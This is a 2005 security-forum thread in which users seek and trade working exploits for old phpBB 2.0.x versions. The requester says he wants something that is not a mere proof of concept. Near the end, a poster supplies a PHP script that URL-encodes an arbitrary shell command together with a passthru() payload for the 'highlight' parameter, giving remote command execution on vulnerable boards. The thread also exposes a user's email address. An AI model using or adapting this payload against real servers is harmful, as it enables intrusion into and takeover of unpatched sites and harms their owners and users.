Waraxe IT Security Portal
Login or Register
December 18, 2024
Menu
Home
Logout
Discussions
Forums
Members List
IRC chat
Tools
Base64 coder
MD5 hash
CRC32 checksum
ROT13 coder
SHA-1 hash
URL-decoder
Sql Char Encoder
Affiliates
y3dips ITsec
Md5 Cracker
User Manuals
AlbumNow
Content
Content
Sections
FAQ
Top
Info
Feedback
Recommend Us
Search
Journal
Your Account
User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144

People Online:
Visitors: 129
Members: 0
Total: 129
Full disclosure
[KIS-2024-07] GFI Kerio Control <= 9.4.5 Multiple HTTP Response Splitting Vulnerabilities
RansomLordNG - anti-ransomware exploit tool
APPLE-SA-12-11-2024-9 Safari 18.2
APPLE-SA-12-11-2024-8 visionOS 2.2
APPLE-SA-12-11-2024-7 tvOS 18.2
APPLE-SA-12-11-2024-6 watchOS 11.2
APPLE-SA-12-11-2024-5 macOS Ventura 13.7.2
APPLE-SA-12-11-2024-4 macOS Sonoma 14.7.2
APPLE-SA-12-11-2024-3 macOS Sequoia 15.2
APPLE-SA-12-11-2024-2 iPadOS 17.7.3
APPLE-SA-12-11-2024-1 iOS 18.2 and iPadOS 18.2
SEC Consult SA-20241211-0 :: Reflected Cross-Site Scripting in Numerix License Server Administration System Login
St. Poelten UAS | Multiple Vulnerabilities in ORing IAP
SEC Consult SA-20241204-0 :: Multiple Critical Vulnerabilities in Image Access Scan2Net (14 CVE)
Microsoft Warbird and PMP security research - technical doc
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> PhpBB -> phpbb 2.0.4 or 2.0.3 anybody got....
Post new topicReply to topic View previous topic :: View next topic
phpbb 2.0.4 or 2.0.3 anybody got....
PostPosted: Fri Mar 18, 2005 11:28 am Reply with quote
shai-tan
Valuable expert
Valuable expert
Joined: Feb 22, 2005
Posts: 477




Anbody got an old 2.0.3 or 2.0.4 exploit sitting around amongst those piles of exploits? I dont really feel like looking through mountains of archives and Databases so Ill just ask the good(cough) people of Waraxe.us Razz

_________________
Shai-tan

?In short: just say NO TO DRUGS, and maybe you won?t end up like the Hurd people.? -- Linus Torvalds
View user's profile Send private message
PostPosted: Sat Mar 19, 2005 12:26 pm Reply with quote
y3dips
Valuable expert
Valuable expert
Joined: Feb 25, 2005
Posts: 281
Location: Indonesia




i have !!!

phpbb 2.0.4 <-- use for test viewtopic.php and otehrs bug
give me an email , so i can send it to you

or u can donlod it form phpbb.sourceforge.net
<but i guest the packet allready patched>

_________________
IO::y3dips->new(http://clog.ammar.web.id);
View user's profile Send private message Visit poster's website Yahoo Messenger
PostPosted: Mon Mar 21, 2005 5:05 am Reply with quote
y3dips
Valuable expert
Valuable expert
Joined: Feb 25, 2005
Posts: 281
Location: Indonesia




FYI , the philes still leave unpatch

coz ive download the 2.0.11 for doin some testing

_________________
IO::y3dips->new(http://clog.ammar.web.id);
View user's profile Send private message Visit poster's website Yahoo Messenger
PostPosted: Mon Mar 21, 2005 11:26 am Reply with quote
shai-tan
Valuable expert
Valuable expert
Joined: Feb 22, 2005
Posts: 477




My email is shown in my profile but here it is anyway: zebcarnell@gmail.com Razz I need older ones because the sessions/cookies have been changed a lot since 2.0.3 and newer exploits dont work so well. I need some thing that isnt PERL or C++ and it cant be proof of concept. Ive tried the highlighter issue but that doesnt work either. If you can help it would be great.

_________________
Shai-tan

?In short: just say NO TO DRUGS, and maybe you won?t end up like the Hurd people.? -- Linus Torvalds
View user's profile Send private message
PostPosted: Mon Mar 21, 2005 2:09 pm Reply with quote
y3dips
Valuable expert
Valuable expert
Joined: Feb 25, 2005
Posts: 281
Location: Indonesia




shai-tan wrote:
My email is shown in my profile but here it is anyway: zebcarnell@gmail.com Razz I need older ones because the sessions/cookies have been changed a lot since 2.0.3 and newer exploits dont work so well. I need some thing that isnt PERL or C++ and it cant be proof of concept. Ive tried the highlighter issue but that doesnt work either. If you can help it would be great.


ok,
btw i wrote some paper about highlighter , you can check it at http://geocities.com/paperecho/phpbbworm-eng.pdf

i hope i can email it to you.
coz my b/w its so small ..
FYI im using GPRS Smile

_________________
IO::y3dips->new(http://clog.ammar.web.id);
View user's profile Send private message Visit poster's website Yahoo Messenger
PostPosted: Tue Mar 22, 2005 12:15 pm Reply with quote
shai-tan
Valuable expert
Valuable expert
Joined: Feb 22, 2005
Posts: 477




Ill download it.
But Highlighter doesnt work with a SQL 2000 db as far as Im aware.
Thats why I need someone to did up an old xploit they might have that works.
Thanks though Wink [/u]

_________________
Shai-tan

?In short: just say NO TO DRUGS, and maybe you won?t end up like the Hurd people.? -- Linus Torvalds
View user's profile Send private message
PostPosted: Tue Mar 22, 2005 2:11 pm Reply with quote
y3dips
Valuable expert
Valuable expert
Joined: Feb 25, 2005
Posts: 281
Location: Indonesia




yupe. ive allready sent the phpbb 2.0.4 to your email , cek it
hope u enjoy it :LOL:

_________________
IO::y3dips->new(http://clog.ammar.web.id);
View user's profile Send private message Visit poster's website Yahoo Messenger
PostPosted: Wed Mar 23, 2005 10:04 am Reply with quote
shai-tan
Valuable expert
Valuable expert
Joined: Feb 22, 2005
Posts: 477




Yeah thanks man....
Its kinda hard to find reliable old exploits around these days

_________________
Shai-tan

?In short: just say NO TO DRUGS, and maybe you won?t end up like the Hurd people.? -- Linus Torvalds
View user's profile Send private message
PostPosted: Wed Mar 23, 2005 3:24 pm Reply with quote
y3dips
Valuable expert
Valuable expert
Joined: Feb 25, 2005
Posts: 281
Location: Indonesia




shai-tan wrote:
Yeah thanks man....
Its kinda hard to find reliable old exploits around these days


NOPE .. hope it helpz you much

_________________
IO::y3dips->new(http://clog.ammar.web.id);
View user's profile Send private message Visit poster's website Yahoo Messenger
Passing Spaces
PostPosted: Tue Apr 05, 2005 4:19 pm Reply with quote
kingspice
Beginner
Beginner
Joined: Apr 05, 2005
Posts: 2




y3dips, just dropped u a pm.

Problem is I, can't seem to work out how to pass spaces
e.g uname -a
Anybody able to do so?

Ta
Kingspice
View user's profile Send private message
Re: Passing Spaces
PostPosted: Wed Apr 06, 2005 6:13 am Reply with quote
y3dips
Valuable expert
Valuable expert
Joined: Feb 25, 2005
Posts: 281
Location: Indonesia




kingspice wrote:
y3dips, just dropped u a pm.

Problem is I, can't seem to work out how to pass spaces
e.g uname -a
Anybody able to do so?

Ta
Kingspice


ive allready read your pm. n i answer it too.
by the way, paperthat i wrote just some POC,
so if u need some space or a long command, u cant use RUSH security team php script to generate it , coz it used another variable included

Code:
<?
$rush='id ; ls -la'; //do what
$highlight='passthru($HTTP_GET_VARS[rush])'; // dont touch

print "?t=%37&rush=";

for ($i=0; $i<strlen($rush); ++$i) {
print '%' . bin2hex(substr($rush,$i,1));
}

print "&highlight=%2527.";

for ($i=0; $i<strlen($highlight); ++$i) {
print '%' . bin2hex(substr($highlight,$i,1));
}

print ".%2527";
?>


see "rush" variable ?
thats the key

_________________
IO::y3dips->new(http://clog.ammar.web.id);
View user's profile Send private message Visit poster's website Yahoo Messenger
phpbb 2.0.4 or 2.0.3 anybody got....
www.waraxe.us Forum Index -> PhpBB
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT
Page 1 of 1

Post new topicReply to topic


Powered by phpBB © 2001-2008 phpBB Group



Space Raider game for Android, free download - Space Raider gameplay video - Zone Raider mobile games
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2024 Janek Vind "waraxe"
Page Generation: 0.045 Seconds